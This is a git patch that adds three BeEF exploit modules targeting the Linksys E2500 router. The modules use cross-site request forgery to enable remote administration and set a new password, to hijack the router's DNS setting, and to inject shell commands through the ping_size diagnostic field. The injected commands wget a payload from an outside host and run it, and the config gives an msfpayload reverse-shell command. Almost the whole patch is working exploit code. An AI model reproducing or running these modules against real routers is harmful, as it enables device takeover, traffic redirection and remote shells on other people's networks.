From 4852f0d8619c29e740cdf285ce7fc7744d2e8a9e Mon Sep 17 00:00:00 2001 From: n00py Date: Wed, 16 Sep 2015 01:57:23 -0700 Subject: [PATCH] linksyse2500 --- .../router/linksys_e2500_csrf/command.js | 47 ++++++++++++++ .../router/linksys_e2500_csrf/config.yaml | 15 +++++ .../router/linksys_e2500_csrf/module.rb | 20 ++++++ .../linksys_e2500_dns_hijack/command.js | 64 +++++++++++++++++++ .../linksys_e2500_dns_hijack/config.yaml | 15 +++++ .../router/linksys_e2500_dns_hijack/module.rb | 19 ++++++ .../router/linksys_e2500_shell/command.js | 46 +++++++++++++ .../router/linksys_e2500_shell/config.yaml | 15 +++++ .../router/linksys_e2500_shell/module.rb | 19 ++++++ 9 files changed, 260 insertions(+) create mode 100644 modules/exploits/router/linksys_e2500_csrf/command.js create mode 100644 modules/exploits/router/linksys_e2500_csrf/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_csrf/module.rb create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/command.js create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/module.rb create mode 100644 modules/exploits/router/linksys_e2500_shell/command.js create mode 100644 modules/exploits/router/linksys_e2500_shell/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_shell/module.rb diff --git a/modules/exploits/router/linksys_e2500_csrf/command.js b/modules/exploits/router/linksys_e2500_csrf/command.js new file mode 100644 index 000000000..5fd779dce --- /dev/null +++ b/modules/exploits/router/linksys_e2500_csrf/command.js @@ -0,0 +1,47 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var port = '<%= @port %>'; + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + var timeout = 15; + + var e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded", + [{'type':'hidden', 'name':'submit_button', 'value':'Management'} , + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'ctm404_enable', 'value':''}, + {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'wait_time', 'value':'4'}, + {'type':'hidden', 'name':'need_reboot', 'value':'0'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'_https_enable', 'value':'0'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'_remote_mgt_https', 'value':'0'}, + {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, + {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'upnp_config', 'value':'1'}, + {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(e2500_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/linksys_e2500_csrf/config.yaml b/modules/exploits/router/linksys_e2500_csrf/config.yaml new file mode 100644 index 000000000..d073bb2b5 --- /dev/null +++ b/modules/exploits/router/linksys_e2500_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + linksys_e2500_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Linksys E2500 CSRF" + description: "Attempts to enable remote administration and change the password on a Linksys E2500 router." + authors: ["Esteban Rodriguez"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/linksys_e2500_csrf/module.rb b/modules/exploits/router/linksys_e2500_csrf/module.rb new file mode 100644 index 000000000..03a6a9bc7 --- /dev/null +++ b/modules/exploits/router/linksys_e2500_csrf/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Linksys_e2500_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/command.js b/modules/exploits/router/linksys_e2500_dns_hijack/command.js new file mode 100644 index 000000000..d6de3d95a --- /dev/null +++ b/modules/exploits/router/linksys_e2500_dns_hijack/command.js @@ -0,0 +1,64 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + // config + var target = 'http://<%= @rhost %>/apply.cgi'; + var dns1 = '<%= @dns1 %>'; + var timeout = 15; + + // validate primary DNS server IP address + var parts = dns1.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + } + + // change DNS + var linksys_e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [ + {'type':'hidden', 'name':'submit_button', 'value': 'index'}, + {'type':'hidden', 'name':'change_action', 'value': ''}, + {'type':'hidden', 'name':'submit_type', 'value': ''}, + {'type':'hidden', 'name':'action', 'value': 'Apply'}, + {'type':'hidden', 'name':'wan_dns', 'value': '4'}, + {'type':'hidden', 'name':'wan_dns0_0', 'value': parts[0]}, + {'type':'hidden', 'name':'wan_dns0_1', 'value': parts[1]}, + {'type':'hidden', 'name':'wan_dns0_2', 'value': parts[2]}, + {'type':'hidden', 'name':'wan_dns0_3', 'value': parts[3]}, + {'type':'hidden', 'name':'wan_dns1_0', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns1_1', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns1_2', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns1_3', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns2_0', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns2_1', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns2_2', 'value': '0'}, + {'type':'hidden', 'name':'wan_dns2_3', 'value': '0'}, + {'type':'hidden', 'name':'wan_wins', 'value': '4'}, + {'type':'hidden', 'name':'wan_wins_0', 'value': '0'}, + {'type':'hidden', 'name':'wan_wins_1', 'value': '0'}, + {'type':'hidden', 'name':'wan_wins_2', 'value': '0'}, + {'type':'hidden', 'name':'wan_wins_3', 'value': '0'}, + + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(linksys_e2500_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml b/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml new file mode 100644 index 000000000..a35db71c8 --- /dev/null +++ b/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + linksys_e2500_dns_hijack: + enable: true + category: ["Exploits", "Router"] + name: "Linksys E2500 DNS Hijack" + description: "Attempts to change the DNS setting on a Linksys E2500 router." + authors: ["Esteban Rodriguez"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/module.rb b/modules/exploits/router/linksys_e2500_dns_hijack/module.rb new file mode 100644 index 000000000..fdc30a18e --- /dev/null +++ b/modules/exploits/router/linksys_e2500_dns_hijack/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Linksys_e2500_dns_hijack < BeEF::Core::Command + + def self.options + return [ + {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'}, + {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/linksys_e2500_shell/command.js b/modules/exploits/router/linksys_e2500_shell/command.js new file mode 100644 index 000000000..5189de68d --- /dev/null +++ b/modules/exploits/router/linksys_e2500_shell/command.js @@ -0,0 +1,46 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var payload = '<%= @payload %>'; + var random = Math.random().toString(36).substring(7); + var timeout = 15; + + + var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", + [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , + {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, + {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, + {'type':'hidden', 'name':'action', 'value':''}, + {'type':'hidden', 'name':'commit', 'value':'0'}, + {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, + {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'}, + {'type':'hidden', 'name':'ping_times', 'value':'5'}, + {'type':'hidden', 'name':'traceroute_ip', 'value':''}, + ]); + + var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", + [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , + {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, + {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, + {'type':'hidden', 'name':'action', 'value':''}, + {'type':'hidden', 'name':'commit', 'value':'0'}, + {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, + {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'}, + {'type':'hidden', 'name':'ping_times', 'value':'5'}, + {'type':'hidden', 'name':'traceroute_ip', 'value':''}, + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(e2500_iframe_1<%= @command_id %>); + document.body.removeChild(e2500_iframe_2<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/linksys_e2500_shell/config.yaml b/modules/exploits/router/linksys_e2500_shell/config.yaml new file mode 100644 index 000000000..4138e0a30 --- /dev/null +++ b/modules/exploits/router/linksys_e2500_shell/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + linksys_e2500_shell: + enable: true + category: ["Exploits", "Router"] + name: "Linksys E2500 Shell" + description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router.
It will wget a binary payload to the temp directory, change permissions, and run the binary.
Command to generate payload: msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP] X > reverse" + authors: ["Esteban Rodriguez"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/linksys_e2500_shell/module.rb b/modules/exploits/router/linksys_e2500_shell/module.rb new file mode 100644 index 000000000..22076bb1a --- /dev/null +++ b/modules/exploits/router/linksys_e2500_shell/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Linksys_e2500_shell < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'payload', 'ui_label' => 'Path to exploit payload', 'value' => 'http://192.0.2.2/payload'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end